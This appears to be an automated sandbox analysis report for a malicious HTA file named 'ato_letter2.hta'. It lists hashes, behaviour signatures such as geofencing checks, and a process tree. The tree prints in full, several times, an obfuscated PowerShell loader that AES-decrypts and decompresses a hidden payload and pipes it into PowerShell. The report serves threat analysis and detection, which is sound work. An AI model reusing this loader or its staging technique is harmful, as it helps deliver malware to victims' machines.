Resubmissions

21-01-2025 13:39

250121-qx27kswrck 10

21-01-2025 11:57

250121-n4kvrsskfv 10

21-01-2025 11:43

250121-nvpglaslfq 10

21-01-2025 11:26

250121-njtbea1qcp 10

Analysis

  • max time kernel
    133s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-01-2025 11:26

General

  • Target

    163.5.169.28/ato_letter2.hta

  • Size

    1.1MB

  • MD5

    54ff1471d93aa84c94efd8cbae4c6c78

  • SHA1

    11c7d8cd8e02b27aee846c353c32b114a7daa3bf

  • SHA256

    e1869d3a88c9190cf43014e3cb48562fc220ff7f6d5baed77c7dfa1c84c5d530

  • SHA512

    5eed6c7f0ffc27e96349fa8fc7c959e87ff35561da2b811f2e59c0fa0bd42f53debd4079da4c1df133b8211c38ef48f03b3f8b5471370bcf6ed79d240fdde804

  • SSDEEP

    1536:SwxapK31kELNEZ1fos0mr/l1vcmafSIm+lIWFR9UU5gou0gQixFaVEYkEOvMXu+f:SOapK31RBEDws7g

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\ato_letter2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5036
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $HeikUII = 'AAAAAAAAAAAAAAAAAAAAAJUqOuW4KC6NBAvMfuqK6bp8mGb6bLm9fWAzjp5jn2QEw1DPIAEVLR/tM1tCOABSJYRJIHsHR+nwBtm/eM3I4TTMXEl/ET9CnIbNyvlt9/LNK1ip+uHxXawFKuZDcM0aZtYYe0NhVAm2cqLZRezYxIP823MoH345L2oPsU/6qv3e6g7/iM9o/BVj0e6LhtUV/LwvA2y8SMIyzvW6Rj9MOWuoo5XUYhYSSit4x9Hpn6LHbZBbpW4rMdUxi3ATLDlKoEf0ZlThOxM9di4jM96Tov2ZVqD3Z25V2DxXbkgCdfuHSu7Tooif4YOU9/3JOuRksBwJWYcJ/JFWZAw6/jelCh7i3M6i6V4QSX+fbsJ8CEawMAVCsEHorjcl+DUqZ9Lzsanb3FtB0GJhJUPhvNBZSS9QpBdKbuQnOWC0BBbJIzCRtxKiM26p2m2M/k+QoZIMMSuhVkj5rfIzRuWIdrFxftSMHly9ShtWAqvLz3oX/BuQShbNWHUUe+/N9jMmQeNa6pVq4Y8EfDBgMfrIdsEOu70AWm4FX3LyK5ybwUXhVrgjuPTzSiaZtFFWGtseCLOv5b4HDcOwji4TJjO7BSqcmfz5gk4hzX2m3Gc4iafh9JfgLdkI2OFBKGZ3nngRvgzwPXYBIhqYS+r6NJWTRnREQ2FLRd38VmAa5arOcvP7IF4DG/ofVajmN9oIRJfWm4z0LW7xZJ27y6hZy5Ol7xPcumURWTr9iCTw9Rgb6lWAwkimXI4qGUIYjctFodN9qoPSsic/NCPDFyhKu9epCQ9nl4QVCzvxfSGvM7KllLg3Plv0QdDTJbWOQufrtzK51hDZR2Mz5UqPKtOqYIj+lnQfkLgdetwhGRtXY8fRTn9IxEleTtaYsMHls8d5tF0ZcH1Qgi1HHUXiBV8Lt4uHmZdsQoGMO7ZrToHgDEVe7QlOKRPvsEfjhObpc7ozW7iRXL6kUAXUIj8zbeCrj5evGSp4ELA8XoFZ9lCBQv7XVk/2HqhP/lDfU+MXM5hzNUj9ugx06eJBK4Fh4r2yMpj43uG5Om4=';$JNqAj = 'TG9HTmhqa2hYUWhoRHdiSVRNZm1kekxRRGVVam1uVVY=';$lYZTTWkh = New-Object 'System.Security.Cryptography.AesManaged';$lYZTTWkh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$lYZTTWkh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lYZTTWkh.BlockSize = 128;$lYZTTWkh.KeySize = 256;$lYZTTWkh.Key = [System.Convert]::FromBase64String($JNqAj);$zlRIi = [System.Convert]::FromBase64String($HeikUII);$HyakcEgs = $zlRIi[0..15];$lYZTTWkh.IV = $HyakcEgs;$lfJyAqixo = $lYZTTWkh.CreateDecryptor();$JvbLhIVwZ = $lfJyAqixo.TransformFinalBlock($zlRIi, 16, $zlRIi.Length - 16);$lYZTTWkh.Dispose();$JExI = New-Object System.IO.MemoryStream( , $JvbLhIVwZ );$PcPXihBj = New-Object System.IO.MemoryStream;$HbjrfOhba = New-Object System.IO.Compression.GzipStream $JExI, ([IO.Compression.CompressionMode]::Decompress);$HbjrfOhba.CopyTo( $PcPXihBj );$HbjrfOhba.Close();$JExI.Close();[byte[]] $vpbeKa = $PcPXihBj.ToArray();$JVZpEn = [System.Text.Encoding]::UTF8.GetString($vpbeKa);$JVZpEn | powershell - }
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2524
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $HeikUII = 'AAAAAAAAAAAAAAAAAAAAAJUqOuW4KC6NBAvMfuqK6bp8mGb6bLm9fWAzjp5jn2QEw1DPIAEVLR/tM1tCOABSJYRJIHsHR+nwBtm/eM3I4TTMXEl/ET9CnIbNyvlt9/LNK1ip+uHxXawFKuZDcM0aZtYYe0NhVAm2cqLZRezYxIP823MoH345L2oPsU/6qv3e6g7/iM9o/BVj0e6LhtUV/LwvA2y8SMIyzvW6Rj9MOWuoo5XUYhYSSit4x9Hpn6LHbZBbpW4rMdUxi3ATLDlKoEf0ZlThOxM9di4jM96Tov2ZVqD3Z25V2DxXbkgCdfuHSu7Tooif4YOU9/3JOuRksBwJWYcJ/JFWZAw6/jelCh7i3M6i6V4QSX+fbsJ8CEawMAVCsEHorjcl+DUqZ9Lzsanb3FtB0GJhJUPhvNBZSS9QpBdKbuQnOWC0BBbJIzCRtxKiM26p2m2M/k+QoZIMMSuhVkj5rfIzRuWIdrFxftSMHly9ShtWAqvLz3oX/BuQShbNWHUUe+/N9jMmQeNa6pVq4Y8EfDBgMfrIdsEOu70AWm4FX3LyK5ybwUXhVrgjuPTzSiaZtFFWGtseCLOv5b4HDcOwji4TJjO7BSqcmfz5gk4hzX2m3Gc4iafh9JfgLdkI2OFBKGZ3nngRvgzwPXYBIhqYS+r6NJWTRnREQ2FLRd38VmAa5arOcvP7IF4DG/ofVajmN9oIRJfWm4z0LW7xZJ27y6hZy5Ol7xPcumURWTr9iCTw9Rgb6lWAwkimXI4qGUIYjctFodN9qoPSsic/NCPDFyhKu9epCQ9nl4QVCzvxfSGvM7KllLg3Plv0QdDTJbWOQufrtzK51hDZR2Mz5UqPKtOqYIj+lnQfkLgdetwhGRtXY8fRTn9IxEleTtaYsMHls8d5tF0ZcH1Qgi1HHUXiBV8Lt4uHmZdsQoGMO7ZrToHgDEVe7QlOKRPvsEfjhObpc7ozW7iRXL6kUAXUIj8zbeCrj5evGSp4ELA8XoFZ9lCBQv7XVk/2HqhP/lDfU+MXM5hzNUj9ugx06eJBK4Fh4r2yMpj43uG5Om4=';$JNqAj = 'TG9HTmhqa2hYUWhoRHdiSVRNZm1kekxRRGVVam1uVVY=';$lYZTTWkh = New-Object 'System.Security.Cryptography.AesManaged';$lYZTTWkh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$lYZTTWkh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lYZTTWkh.BlockSize = 128;$lYZTTWkh.KeySize = 256;$lYZTTWkh.Key = [System.Convert]::FromBase64String($JNqAj);$zlRIi = [System.Convert]::FromBase64String($HeikUII);$HyakcEgs = $zlRIi[0..15];$lYZTTWkh.IV = $HyakcEgs;$lfJyAqixo = $lYZTTWkh.CreateDecryptor();$JvbLhIVwZ = $lfJyAqixo.TransformFinalBlock($zlRIi, 16, $zlRIi.Length - 16);$lYZTTWkh.Dispose();$JExI = New-Object System.IO.MemoryStream( , $JvbLhIVwZ );$PcPXihBj = New-Object System.IO.MemoryStream;$HbjrfOhba = New-Object System.IO.Compression.GzipStream $JExI, ([IO.Compression.CompressionMode]::Decompress);$HbjrfOhba.CopyTo( $PcPXihBj );$HbjrfOhba.Close();$JExI.Close();[byte[]] $vpbeKa = $PcPXihBj.ToArray();$JVZpEn = [System.Text.Encoding]::UTF8.GetString($vpbeKa);$JVZpEn | powershell -
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4832
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $HeikUII = 'AAAAAAAAAAAAAAAAAAAAAJUqOuW4KC6NBAvMfuqK6bp8mGb6bLm9fWAzjp5jn2QEw1DPIAEVLR/tM1tCOABSJYRJIHsHR+nwBtm/eM3I4TTMXEl/ET9CnIbNyvlt9/LNK1ip+uHxXawFKuZDcM0aZtYYe0NhVAm2cqLZRezYxIP823MoH345L2oPsU/6qv3e6g7/iM9o/BVj0e6LhtUV/LwvA2y8SMIyzvW6Rj9MOWuoo5XUYhYSSit4x9Hpn6LHbZBbpW4rMdUxi3ATLDlKoEf0ZlThOxM9di4jM96Tov2ZVqD3Z25V2DxXbkgCdfuHSu7Tooif4YOU9/3JOuRksBwJWYcJ/JFWZAw6/jelCh7i3M6i6V4QSX+fbsJ8CEawMAVCsEHorjcl+DUqZ9Lzsanb3FtB0GJhJUPhvNBZSS9QpBdKbuQnOWC0BBbJIzCRtxKiM26p2m2M/k+QoZIMMSuhVkj5rfIzRuWIdrFxftSMHly9ShtWAqvLz3oX/BuQShbNWHUUe+/N9jMmQeNa6pVq4Y8EfDBgMfrIdsEOu70AWm4FX3LyK5ybwUXhVrgjuPTzSiaZtFFWGtseCLOv5b4HDcOwji4TJjO7BSqcmfz5gk4hzX2m3Gc4iafh9JfgLdkI2OFBKGZ3nngRvgzwPXYBIhqYS+r6NJWTRnREQ2FLRd38VmAa5arOcvP7IF4DG/ofVajmN9oIRJfWm4z0LW7xZJ27y6hZy5Ol7xPcumURWTr9iCTw9Rgb6lWAwkimXI4qGUIYjctFodN9qoPSsic/NCPDFyhKu9epCQ9nl4QVCzvxfSGvM7KllLg3Plv0QdDTJbWOQufrtzK51hDZR2Mz5UqPKtOqYIj+lnQfkLgdetwhGRtXY8fRTn9IxEleTtaYsMHls8d5tF0ZcH1Qgi1HHUXiBV8Lt4uHmZdsQoGMO7ZrToHgDEVe7QlOKRPvsEfjhObpc7ozW7iRXL6kUAXUIj8zbeCrj5evGSp4ELA8XoFZ9lCBQv7XVk/2HqhP/lDfU+MXM5hzNUj9ugx06eJBK4Fh4r2yMpj43uG5Om4=';$JNqAj = 'TG9HTmhqa2hYUWhoRHdiSVRNZm1kekxRRGVVam1uVVY=';$lYZTTWkh = New-Object 'System.Security.Cryptography.AesManaged';$lYZTTWkh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$lYZTTWkh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lYZTTWkh.BlockSize = 128;$lYZTTWkh.KeySize = 256;$lYZTTWkh.Key = [System.Convert]::FromBase64String($JNqAj);$zlRIi = [System.Convert]::FromBase64String($HeikUII);$HyakcEgs = $zlRIi[0..15];$lYZTTWkh.IV = $HyakcEgs;$lfJyAqixo = $lYZTTWkh.CreateDecryptor();$JvbLhIVwZ = $lfJyAqixo.TransformFinalBlock($zlRIi, 16, $zlRIi.Length - 16);$lYZTTWkh.Dispose();$JExI = New-Object System.IO.MemoryStream( , $JvbLhIVwZ );$PcPXihBj = New-Object System.IO.MemoryStream;$HbjrfOhba = New-Object System.IO.Compression.GzipStream $JExI, ([IO.Compression.CompressionMode]::Decompress);$HbjrfOhba.CopyTo( $PcPXihBj );$HbjrfOhba.Close();$JExI.Close();[byte[]] $vpbeKa = $PcPXihBj.ToArray();$JVZpEn = [System.Text.Encoding]::UTF8.GetString($vpbeKa);$JVZpEn
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3200
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Blocklisted process makes network request
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1240

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    1KB

    MD5

    def65711d78669d7f8e69313be4acf2e

    SHA1

    6522ebf1de09eeb981e270bd95114bc69a49cda6

    SHA256

    aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

    SHA512

    05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    15KB

    MD5

    063d76cec88ac2756bb3c3f8be4d0f6f

    SHA1

    4fb72e940be68e9e97dee7253cf282762c73e6a5

    SHA256

    6edcba317c691d84bc13618e3986f698ac60ed8f5e3d4eadc506400fc89cf898

    SHA512

    4627e55f0423863e856afc4814cc5ba1d7847adf1a163d6fcdb39ce540115b789c56642703d235c5a19da1c265834300d266e93abe536599ed6ac069a90394aa

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y1k4z545.qsv.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1240-68-0x0000000008250000-0x0000000008261000-memory.dmp

    Filesize

    68KB

  • memory/1240-67-0x0000000008210000-0x000000000821A000-memory.dmp

    Filesize

    40KB

  • memory/1240-66-0x0000000008110000-0x00000000081B3000-memory.dmp

    Filesize

    652KB

  • memory/1240-65-0x00000000080F0000-0x000000000810E000-memory.dmp

    Filesize

    120KB

  • memory/1240-54-0x000000006DDA0000-0x000000006DDEC000-memory.dmp

    Filesize

    304KB

  • memory/1240-55-0x000000006E110000-0x000000006E464000-memory.dmp

    Filesize

    3.3MB

  • memory/1240-53-0x00000000080B0000-0x00000000080E2000-memory.dmp

    Filesize

    200KB

  • memory/1240-51-0x0000000007BA0000-0x0000000007C16000-memory.dmp

    Filesize

    472KB

  • memory/1240-49-0x0000000007A90000-0x0000000007AD4000-memory.dmp

    Filesize

    272KB

  • memory/2524-7-0x00000000054F0000-0x0000000005556000-memory.dmp

    Filesize

    408KB

  • memory/2524-18-0x0000000005B60000-0x0000000005B7E000-memory.dmp

    Filesize

    120KB

  • memory/2524-21-0x0000000006060000-0x000000000607A000-memory.dmp

    Filesize

    104KB

  • memory/2524-23-0x00000000073A0000-0x0000000007944000-memory.dmp

    Filesize

    5.6MB

  • memory/2524-26-0x00000000714E0000-0x0000000071C90000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-20-0x0000000006D50000-0x0000000006DE6000-memory.dmp

    Filesize

    600KB

  • memory/2524-1-0x0000000002230000-0x0000000002266000-memory.dmp

    Filesize

    216KB

  • memory/2524-19-0x0000000005BA0000-0x0000000005BEC000-memory.dmp

    Filesize

    304KB

  • memory/2524-3-0x0000000004CF0000-0x0000000005318000-memory.dmp

    Filesize

    6.2MB

  • memory/2524-22-0x00000000060C0000-0x00000000060E2000-memory.dmp

    Filesize

    136KB

  • memory/2524-17-0x0000000005560000-0x00000000058B4000-memory.dmp

    Filesize

    3.3MB

  • memory/2524-0-0x00000000714EE000-0x00000000714EF000-memory.dmp

    Filesize

    4KB

  • memory/2524-6-0x0000000005480000-0x00000000054E6000-memory.dmp

    Filesize

    408KB

  • memory/2524-5-0x0000000005320000-0x0000000005342000-memory.dmp

    Filesize

    136KB

  • memory/2524-4-0x00000000714E0000-0x0000000071C90000-memory.dmp

    Filesize

    7.7MB

  • memory/2524-2-0x00000000714E0000-0x0000000071C90000-memory.dmp

    Filesize

    7.7MB

  • memory/3200-48-0x00000000076C0000-0x0000000007D3A000-memory.dmp

    Filesize

    6.5MB

  • memory/3200-28-0x0000000005880000-0x0000000005BD4000-memory.dmp

    Filesize

    3.3MB